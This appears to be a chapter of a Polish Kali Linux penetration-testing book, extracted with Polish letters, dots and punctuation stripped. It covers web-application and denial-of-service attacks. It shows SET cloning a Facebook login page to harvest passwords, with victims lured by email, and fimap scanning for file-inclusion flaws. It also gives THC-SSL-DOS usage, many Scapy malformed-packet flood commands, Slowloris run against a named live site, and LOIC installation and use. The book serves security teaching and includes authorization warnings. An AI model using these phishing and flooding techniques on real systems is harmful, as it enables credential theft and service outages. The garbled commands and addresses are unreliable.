Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
